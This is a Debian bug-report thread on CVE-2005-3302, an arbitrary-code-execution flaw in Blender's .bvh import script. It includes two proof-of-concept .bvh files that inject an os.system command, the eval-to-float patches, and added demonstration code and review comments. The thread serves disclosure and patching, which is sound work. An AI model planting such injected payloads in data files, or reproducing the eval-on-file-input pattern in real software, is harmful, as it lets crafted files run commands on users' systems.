Your message dated Wed, 16 Nov 2005 15:54:07 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:35:40 +0000
Subject: blender: Arbitrary code execution when importing a .bvh file
From: Joxean Koret <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Date: Fri, 30 Sep 2005 12:51:35 +0200
Message-Id: <[EMAIL PROTECTED]>

Subject: blender: Arbitrary code execution when importing a .bvh file
Package: blender
Version: 2.36-1
Severity: grave
Justification: user security hole

The bvh_import.py script supplied with the current Debian Stable and (I
think) unstable versions of Blender is vulnerable to arbitrary code
execution.

The problem was corrected on 2005/01/22 in the CVS but the main package
doesn't come with the fixed script.

Attached goes the e-mail sent to the Blender people, one
working exploit to test the vulnerability under Debian, and 2 proofs of
concept.

Regards,
Joxean Koret

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages blender depends on:
ii  gettext [libg 0.14.4-2                   GNU Internationalization utilities
ii  libc6         2.3.2.ds1-22               GNU C Library: Shared libraries an
ii  libfreetype6  2.1.7-2.4                  FreeType 2 font engine, shared lib
ii  libgcc1       1:3.4.3-13                 GCC support library
ii  libjpeg62     6b-10                      The Independent JPEG Group's JPEG
ii  libopenal0    0.2004090900-1.1           OpenAL is a portable library for 3
ii  libpng12-0    1.2.8rel-1                 PNG library - runtime
ii  libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii  libstdc++5    1:3.3.5-13                 The GNU Standard C++ Library v3
ii  libx11-6      4.3.0.dfsg.1-14            X Window System protocol client li
ii  python2.3     2.3.5-4                    An interactive high-level object-o
ii  xlibmesa-gl [ 4.3.0.dfsg.1-14            Mesa 3D graphics library [XFree86]
ii  xlibmesa-glu  4.3.0.dfsg.1-14            Mesa OpenGL utility library [XFree
ii  xlibs         4.3.0.dfsg.1-14            X Keyboard Extension (XKB) configu
ii  zlib1g        1:1.2.2-4.sarge.2          compression library - runtime

-- no debconf information


[Attachment exploit.bvh: contents not reproduced on this page]

[Attachment first.mail.txt: contents not reproduced on this page]


Attachment poc1.bvh (base64 decoded):

HIERARCHY
End Site

1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4


Attachment poc2.bvh (base64 decoded):

HIERARCHY
ROOT name 1 2

1 2 3 4
1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4


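Added example, not code from the bug report, from Blender's bvh_import.py, or from either correspondent: a cut-down offset reader in the shape the report describes (the offset line is taken two lines after ROOT/JOINT or End Site and only its tokens 1..3 are converted, token 0 is never checked), with the pre-fix eval() conversion beside a float()-based one, plus a token scanner that flags what the old script would have evaluated. The PoC text is constructed from the decoded poc1.bvh above with the `touch` payload swapped for `__import__('os').getpid()`, which proves code ran without touching the filesystem; the benign file, the keyword set and every function name in the block are assumptions of this illustration.

```python
"""Cut-down BVH offset reader: eval()-based (the vulnerable pattern) beside a
float()-based one, plus a scanner for tokens the old code would have run.
Added illustration; not bvh_import.py and not the attached PoCs verbatim."""
import math
import os
import re

# Constructed input shaped like the decoded poc1.bvh: the payload token has
# no spaces (the original used chr(32)) so str.split() keeps it whole.  The
# original ran `touch /tmp/bvh_import_exploit`; getpid() is harmless and its
# return value proves execution just as well.
PAYLOAD = "__import__('os').getpid()"
POC = "HIERARCHY\nEnd Site\n\n1 %s 3 4\n" % PAYLOAD

# A small well-formed file (constructed) with the layout real exporters use.
BENIGN = """HIERARCHY
ROOT Hips
{
    OFFSET 0.0 0.0 0.0
    CHANNELS 6 Xposition Yposition Zposition Zrotation Xrotation Yrotation
    JOINT Chest
    {
        OFFSET 0.0 5.21 0.0
        CHANNELS 3 Zrotation Xrotation Yrotation
        End Site
        {
            OFFSET 0.0 18.65 0.0
        }
    }
}
MOTION
Frames: 1
Frame Time: 0.033333
8.03 35.01 88.36 -3.41 14.78 -164.35 13.09 40.30 -24.60
"""


class BVHError(ValueError):
    """Raised by the hardened reader for anything that is not a plain number."""


def parse_number(tok):
    """Hardened stand-in for eval(tok): float() cannot evaluate code, and
    refusing nan/inf keeps garbage out of the offsets and curves."""
    try:
        value = float(tok)
    except ValueError:
        raise BVHError("non-numeric token %r" % tok)
    if not math.isfinite(value):
        raise BVHError("non-finite value %r" % tok)
    return value


def read_offsets(text, number):
    """Return [(node, (x, y, z))].  The offset line sits two lines after
    'ROOT name' / 'JOINT name' / 'End Site'; only tokens 1..3 are used and
    token 0 ('OFFSET') is not checked, which is why the PoC can put '1' there."""
    lines = [ln.split() for ln in text.splitlines()]
    found = []
    i = 0
    while i < len(lines):
        tok = lines[i]
        if tok and (tok[0] in ("ROOT", "JOINT") or tok[:2] == ["End", "Site"]):
            node = tok[1] if tok[0] in ("ROOT", "JOINT") else "End Site"
            i += 2                                   # skip the '{' line
            off = lines[i] if i < len(lines) else []
            if len(off) < 4:
                raise BVHError("short offset line %d" % (i + 1))
            found.append((node, tuple(number(t) for t in off[1:4])))
        i += 1
    return found


def read_offsets_vulnerable(text):
    return read_offsets(text, eval)            # the pre-fix behaviour


def read_offsets_fixed(text):
    return read_offsets(text, parse_number)    # float() plus sanity checks


_KEYWORDS = {"HIERARCHY", "ROOT", "JOINT", "End", "Site", "OFFSET", "CHANNELS",
             "MOTION", "Frames:", "Frame", "Time:", "{", "}",
             "Xposition", "Yposition", "Zposition",
             "Xrotation", "Yrotation", "Zrotation"}
_NUMBER = re.compile(r"^[-+]?(\d+\.?\d*|\.\d+)([eE][-+]?\d+)?$")


def scan_for_code(text):
    """[(line_no, token)] for every token that is neither a BVH keyword, a
    node name nor a plain number: the tokens the old script would eval()."""
    hits = []
    for n, ln in enumerate(text.splitlines(), 1):
        toks = ln.split()
        for j, t in enumerate(toks):
            if t in _KEYWORDS or _NUMBER.match(t):
                continue
            if j == 1 and toks[0] in ("ROOT", "JOINT"):
                continue                             # joint name
            hits.append((n, t))
    return hits


def vulnerable_ran_code():
    """True when the eval() reader executed the payload: its X offset equals
    this process's pid, a value no BVH file could legitimately contain."""
    return read_offsets_vulnerable(POC)[0][1][0] == os.getpid()


def fixed_rejects(text):
    try:
        read_offsets_fixed(text)
    except BVHError:
        return True
    return False


if __name__ == "__main__":
    print("eval() reader executed the payload:", vulnerable_ran_code())
    print("float() reader rejects the PoC:", fixed_rejects(POC))
    print("scanner hits in PoC:", scan_for_code(POC))
    print("benign offsets:", read_offsets_fixed(BENIGN))
```

The check that the eval() reader hands back the importing process's pid as an X offset is the whole demonstration: no file can know that value, so the token must have been executed. The scanner is a cheap pre-import check for .bvh files from untrusted sources and works whether or not the fixed script is installed; it only knows the keywords listed above, so a file using other extensions would need the set widened.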
---------------------------------------
Received: (at 330895-done) by bugs.debian.org; 16 Nov 2005 14:54:16 +0000
Date: Wed, 16 Nov 2005 15:54:07 +0100
From: Florian Ernst <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file
Message-ID: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>

Package: blender
Version: 2.37a-1

Dear Security Team,

as this package's maintainer hasn't shown any visible reaction to this
issue I now try to take care...

On Fri, 30 Sep 2005 12:51:35 +0200, Joxean Koret wrote:
> The bvh_import.py script supplied with the current Debian Stable and (I
> think) unstable versions of Blender is vulnerable to arbitrary code
> execution.

I can confirm that this particular vulnerability could trick a user
into executing arbitrary commands with his rights. All an attacker has
to do is to provide a specially crafted bvh file (used for Motion
Capture data) for the user to import into a blender scene, and all
commands contained therein will be executed in the user's environment.
The demo exploit attached to Joxean's mail works under blender-2.36.


Oldstable (2.23-0.1) isn't affected as it shipped a version of blender
that didn't include this script yet (and was in non-free).

Stable (2.36-1) is affected, I've attached two patches that remove all
'eval's in the script, which in fact basically is what upstream did.
The first patch (CVE-2005-3302_upstream_dpatch.diff) essentially
contains what upstream did to resolve this issue, while the second
patch (CVE-2005-3302_dpatch.diff) contains what I considered to be a
minimal set of changes to remove this particular vulnerability.
Please see
<http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scripts/bvh_import.py.diff?r1=1.4&r2=1.5&cvsroot=bf-blender>
for upstream details.
I can confirm that these changes prevent the exploit of this
vulnerability, tested on both blender-2.36 and 2.37a.

Testing isn't affected anymore as blender has been removed from
Testing due to general bugginess.

Unstable was partially affected: while 2.37a-1 already included the
upstream fix for this problem this version hadn't been built on all
archs due to bug#333958. However, this FTBFS has been resolved as of
2.37a-1.1, so right now all versions currently present in Unstable are
_not_ vulnerable. Consequently I now close this bug for the
corresponding version in Unstable with this mail.


Please issue an update for Stable when you think it is due time.

HTH,
Flo

Attachment: CVE-2005-3302_upstream_dpatch.diff

diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li=
st
--- blender-2.36/debian/patches/00list
+++ blender-2.36/debian/patches/00list
@@ -2,0 +3 @@
+03_fix_arbitrary_code_execution_in_bvh_import.py
diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog
--- blender-2.36/debian/changelog
+++ blender-2.36/debian/changelog
@@ -1,3 +1,12 @@
+blender (2.36-1sarge1) stable-security; urgency=3Dhigh
+
+  * patch release/scripts/bvh_import.py to use float instead of eval by
+    adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch,
+    thus preventing arbitrary code execution when importing a .bvh file;
+    for reference, this is CVE-2005-3302 - closes: #330895
+
+ -- Florian Ernst <[EMAIL PROTECTED]>  Wed, 16 Nov 2005 15:03:10 +0100
+
 blender (2.36-1) unstable; urgency=3Dhigh
=20
   * The "Back From The Gig" release.
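Review bot: the changelog entry describes the change as "use float instead of eval", but the dpatch it adds also rewrites motion-channel tokens that contain no '.' by inserting a decimal point (the VAL0..VAL5 blocks), which changes the value parsed from short integer tokens; that behavioural change belongs in the entry so users of a stable-security update know motion data may now be interpreted differently. Also keep this wording in sync with whichever of the two candidate dpatches is actually uploaded, since both carry the same version and patch name.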
only in patch2:
unchanged:
--- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh=
_import.py.dpatch
+++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo=
rt.py.dpatch
@@ -0,0 +1,67 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns=
t <[EMAIL PROTECTED]>
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: Fix for CVE-2005-3302, see bug#330895 and
+## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc=
ripts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender>
+## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc=
ripts/bvh_import.py.diff?r1=3D1.6&r2=3D1.7&cvsroot=3Dbf-blender>
+
[EMAIL PROTECTED]@
+diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea=
se/scripts/bvh_import.py
+--- blender-2.36~/release/scripts/bvh_import.py        2004-11-07 
17:31:13.000000=
000 +0100
++++ blender-2.36/release/scripts/bvh_import.py 2005-11-16 15:08:35.0000000=
00 +0100
+@@ -331,7 +331,7 @@
+      =20
+       name =3D lines[lineIdx][1]
+       lineIdx +=3D 2 # Incriment to the next line (Offset)
+-      offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++      offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+       lineIdx +=3D 1 # Incriment to the next line (Channels)
+      =20
+       # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,=
 Zrotation]
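Review bot: float() on the three offset tokens closes the code-execution hole, but a non-numeric token now raises an uncaught ValueError, so a malformed or hostile file aborts the whole import with a traceback instead of an error naming the line. Wrap the three conversions in a try/except ValueError that reports lineIdx and the token, and consider refusing non-finite results (float('1e999') is inf) before the offset tuple is used.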
+@@ -367,7 +367,7 @@
+     # Account for an end node
+     if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'=
: # There is somtimes a name afetr 'End Site' but we will ignore it.
+       lineIdx +=3D 2 # Incriment to the next line (Offset)
+-      offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++      offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+       makeEnd(parent, prefix, offset)
+=20
+       # Just so we can remove the Parents in a uniform way- End end never=
 has kids
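Review bot: this End Site branch repeats the joint branch's offset conversion line for line, so any validation added to one later will be missed in the other; pull `offset = ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), float(lines[lineIdx][3]) )` into a small helper called from both places. The "Incriment", "somtimes" and "afetr" typos in the untouched comments could go in the same pass.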
+@@ -431,14 +431,32 @@
+         if debug: Blender.Redraw()=20
+         while obIdx < len(objectList) -1:
+           if channelList[obIdx][0] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]])))
++            VAL0=3Dlines[lineIdx][channelList[obIdx][0]]
++            if VAL0.find('.')=3D=3D-1:
++              VAL0=3DVAL0[:len(VAL0)-6]+'.'+VAL0[-6:]
++            objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * float(VAL0)))
+           if channelList[obIdx][1] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]])))
++            VAL1=3Dlines[lineIdx][channelList[obIdx][1]]
++            if VAL1.find('.')=3D=3D-1:
++              VAL1=3DVAL1[:len(VAL1)-6]+'.'+VAL1[-6:]
++            objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * float(VAL1)))
+           if channelList[obIdx][2] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]])))
++            VAL2=3Dlines[lineIdx][channelList[obIdx][2]]
++            if VAL2.find('.')=3D=3D-1:
++              VAL2=3DVAL2[:len(VAL2)-6]+'.'+VAL2[-6:]
++            objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * float(VAL2)))
+          =20
+           if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] !=
=3D '-1' or channelList[obIdx][5] !=3D '-1':
+-            x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx=
][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch=
annelList[obIdx][5]]))
++            VAL3=3Dlines[lineIdx][channelList[obIdx][3]]
++            if VAL3.find('.')=3D=3D-1:
++              VAL3=3DVAL3[:len(VAL3)-6]+'.'+VAL3[-6:]
++            VAL4=3Dlines[lineIdx][channelList[obIdx][4]]
++            if VAL4.find('.')=3D=3D-1:
++              VAL4=3DVAL4[:len(VAL4)-6]+'.'+VAL4[-6:]
++            VAL5=3Dlines[lineIdx][channelList[obIdx][5]]
++            if VAL5.find('.')=3D=3D-1:
++              VAL5=3DVAL5[:len(VAL5)-6]+'.'+VAL5[-6:]
++            x, y, z =3D eulerRotate(float(VAL3), float(VAL4), float(VAL5))
+             objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren=
tFrame, x))
+             objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren=
tFrame, y))
+             objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren=
tFrame, z))
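Review bot: the `if VAL0.find('.')==-1: VAL0=VAL0[:len(VAL0)-6]+'.'+VAL0[-6:]` rewrite applied to each of the six channels is a behavioural change on top of the eval removal: for any token of six characters or fewer the slice `VAL0[:len(VAL0)-6]` is empty, so `15` becomes `.15` and is silently scaled by 1/100, and a negative token such as `-5` becomes `.-5`, which float() rejects with a ValueError. If this fixed-point convention is needed for some exporter, gate it on a minimum token length and a leading sign, or drop it and call float() on the token directly; either way the six copies should be one helper.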

Attachment: CVE-2005-3302_dpatch.diff

diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li=
st
--- blender-2.36/debian/patches/00list
+++ blender-2.36/debian/patches/00list
@@ -2,0 +3 @@
+03_fix_arbitrary_code_execution_in_bvh_import.py
diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog
--- blender-2.36/debian/changelog
+++ blender-2.36/debian/changelog
@@ -1,3 +1,15 @@
+blender (2.36-1sarge1) stable-security; urgency=3Dhigh
+
+  * patch release/scripts/bvh_import.py to use float instead of eval by
+    adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch,
+    thus preventing arbitrary code execution when importing a .bvh file;
+    this fix differs from the changes in
+    <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scrip=
ts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender>
+    in that it doesn't provide the new checks introduced therein;
+    for reference, this is CVE-2005-3302 - closes: #330895
+
+ -- Florian Ernst <[EMAIL PROTECTED]>  Wed, 16 Nov 2005 14:45:57 +0100
+
 blender (2.36-1) unstable; urgency=3Dhigh
=20
   * The "Back From The Gig" release.
only in patch2:
unchanged:
--- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh=
_import.py.dpatch
+++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo=
rt.py.dpatch
@@ -0,0 +1,47 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns=
t <[EMAIL PROTECTED]>
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: Fix for CVE-2005-3302, see bug#330895
+
[EMAIL PROTECTED]@
+diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea=
se/scripts/bvh_import.py
+--- blender-2.36~/release/scripts/bvh_import.py        2004-11-07 
17:31:13.000000=
000 +0100
++++ blender-2.36/release/scripts/bvh_import.py 2005-11-02 13:36:01.0000000=
00 +0100
+@@ -331,7 +331,7 @@
+      =20
+       name =3D lines[lineIdx][1]
+       lineIdx +=3D 2 # Incriment to the next line (Offset)
+-      offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++      offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+       lineIdx +=3D 1 # Incriment to the next line (Channels)
+      =20
+       # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,=
 Zrotation]
+@@ -367,7 +367,7 @@
+     # Account for an end node
+     if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'=
: # There is somtimes a name afetr 'End Site' but we will ignore it.
+       lineIdx +=3D 2 # Incriment to the next line (Offset)
+-      offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval=
(lines[lineIdx][3]) )
++      offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl=
oat(lines[lineIdx][3]) )
+       makeEnd(parent, prefix, offset)
+=20
+       # Just so we can remove the Parents in a uniform way- End end never=
 has kids
+@@ -431,14 +431,14 @@
+         if debug: Blender.Redraw()=20
+         while obIdx < len(objectList) -1:
+           if channelList[obIdx][0] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]])))
++            objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren=
tFrame, scale * float(lines[lineIdx][channelList[obIdx][0]])))
+           if channelList[obIdx][1] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]])))
++            objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren=
tFrame, scale * float(lines[lineIdx][channelList[obIdx][1]])))
+           if channelList[obIdx][2] !=3D -1:
+-            objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]])))
++            objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren=
tFrame, scale * float(lines[lineIdx][channelList[obIdx][2]])))
+          =20
+           if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] !=
=3D '-1' or channelList[obIdx][5] !=3D '-1':
+-            x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx=
][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch=
annelList[obIdx][5]]))
++            x, y, z =3D eulerRotate(float(lines[lineIdx][channelList[obId=
x][3]]), float(lines[lineIdx][channelList[obIdx][4]]), float(lines[lineIdx]=
[channelList[obIdx][5]]))
+             objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren=
tFrame, x))
+             objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren=
tFrame, y))
+             objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren=
tFrame, z))
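Review bot: the rotation branch's condition `if channelList[obIdx][3] != '-1' or ...` compares against the string '-1' while the three position branches above it compare against the integer -1; if channelList holds integers the rotation branch always runs and `lines[lineIdx][-1]` quietly picks the last column of the motion line. This is pre-existing, but since the patch already rewrites the body under that line it would be cheap to make the sentinel consistent. Replacing eval with float here is otherwise sufficient: float() takes only a string and cannot evaluate an expression.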

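Added example, not part of the bug report or of the Debian patches: an ast-based scan that lists direct calls to eval and its relatives, which is the check to run against the script actually installed on a system to confirm the claim that the patches remove every eval. The BEFORE snippet is constructed in the shape of the lines the dpatch changes and is not copied from bvh_import.py; the function names and the file path usage are assumptions of this illustration.

```python
"""AST audit for the calls a reviewer of this fix wants gone.  Added
illustration, not part of the bug report or of the Debian patches."""
import ast

# Names whose call can turn a file token into executed code.  (In Python 2
# exec is a statement; ast.parse under Python 3 sees it as a call.)
DANGEROUS = ("eval", "exec", "compile", "execfile", "__import__")


def dangerous_calls(source):
    """Sorted [(line, name)] for each direct call to a DANGEROUS name.
    Direct calls only: eval reached through getattr(builtins, ...) or an
    alias is not caught, so an empty result is necessary, not sufficient."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DANGEROUS):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)


def audit_file(path):
    """Same check over a file on disk, e.g. the installed bvh_import.py
    (location is distribution-specific; assumed, not taken from the page)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return dangerous_calls(fh.read())


# Constructed snippet shaped like the lines the dpatch changes; it is not the
# script itself.  AFTER is the same text with the fix applied.
BEFORE = """\
def read_offset(lines, lineIdx):
    lineIdx += 2
    offset = ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval(lines[lineIdx][3]) )
    return offset
"""
AFTER = BEFORE.replace("eval(", "float(")

if __name__ == "__main__":
    print("before:", dangerous_calls(BEFORE))
    print("after: ", dangerous_calls(AFTER))
```

Because the scan works on the syntax tree rather than on text, it is not fooled by the word "eval" inside comments or strings, and it reports the line number so the finding can be matched against the hunks above; it does not follow aliases, so a script that does `e = eval` and calls `e(...)` would need a data-flow pass instead.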